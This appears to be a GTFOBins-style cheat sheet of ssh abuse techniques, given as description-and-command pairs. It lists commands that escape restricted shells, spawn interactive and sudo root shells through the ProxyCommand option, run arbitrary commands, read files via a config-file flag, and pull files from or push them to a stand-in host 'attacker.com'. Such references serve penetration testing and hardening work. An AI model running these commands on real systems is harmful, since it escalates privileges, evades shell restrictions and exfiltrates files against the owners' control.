| description |
code |
| Reconnecting may help bypassing restricted shells. |
ssh localhost $SHELL --noprofile --norc |
|
| description |
code |
| Spawn interactive shell through ProxyCommand option. |
ssh -o ProxyCommand="/bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/bash -i'" whatever.invalid |
|
|
| description |
code |
| The executed command output is not shown and can be redirected to a file. |
CMD=/usr/bin/id
ssh -o ProxyCommand="${CMD}" whatever.invalid
|
|
|
| description |
code |
| Spawn interactive root shell through ProxyCommand option. |
sudo ssh -o ProxyCommand="/bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/bash -i'" whatever.invalid |
|
| description |
code |
| The executed command output is not shown and can be redirected to a file. |
CMD=/usr/bin/id
sudo ssh -o ProxyCommand="${CMD}" whatever.invalid
|
|
|
| description |
code |
| Fetch a remote file from a SSH server. |
HOST=user@attacker.com
RPATH=file_to_get
LPATH=where_to_save
ssh $HOST "cat $RPATH" > $LPATH
|
|
|
| description |
code |
| Send local file to a SSH server. |
HOST=user@attacker.com
RPATH=where_to_save
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH
|
|
|
| description |
code |
| The read file content is corrupted by error prints. |
LFILE=file_to_read
ssh -F $LFILE localhost
|
|
|
